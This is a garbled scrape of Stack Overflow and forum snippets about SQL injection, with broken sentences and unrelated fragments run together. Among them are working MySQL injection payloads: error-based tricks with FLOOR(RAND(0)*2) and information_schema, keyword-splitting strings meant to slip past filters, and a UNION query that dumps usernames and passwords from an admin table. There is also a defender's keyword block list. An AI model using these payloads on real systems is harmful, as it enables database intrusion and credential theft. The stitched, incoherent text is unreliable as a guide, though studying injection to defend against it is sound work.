sql - Union to handle NULL values - Stack Overflow ... count(*),concat((select ( select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from
Display results as threads. More... Useful Searches.
So, as it's being used a lot, I would submit my answer. In my opinion, the aim of these requests is to check the presence or absence of a sql injection.
On my site, for instance, it's entirely safe to fail any request with the string 'concat' or %20union' or 'information_schema'. Indeed, I can even ban any IP that so much as bothers to attempt a request including such strings.
The used SELECT statement, referer: http://site.com/index.php?page=shop.browse&category_id=25&option...
You can clearly see rules containing keywords "select", "union", "all" etc.
+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))). URL will look like
...UNIunionON+SELselectECT +union+distinct+select+ +union+distinctROW+select+ union+/.
+and+(select+*+from+(select+*+from+information_schema.tables+as+x+join+information_schema.tables+y+using+(TABLE_CATALOG))as+z)--. Duplicate column name 'TABLE_SCHEMA'. That's it for now, I'll try and update this when I learn more methods of error based injection.
-1 UNION SELECT group_concat(username, 0x3a, password) FROM admin.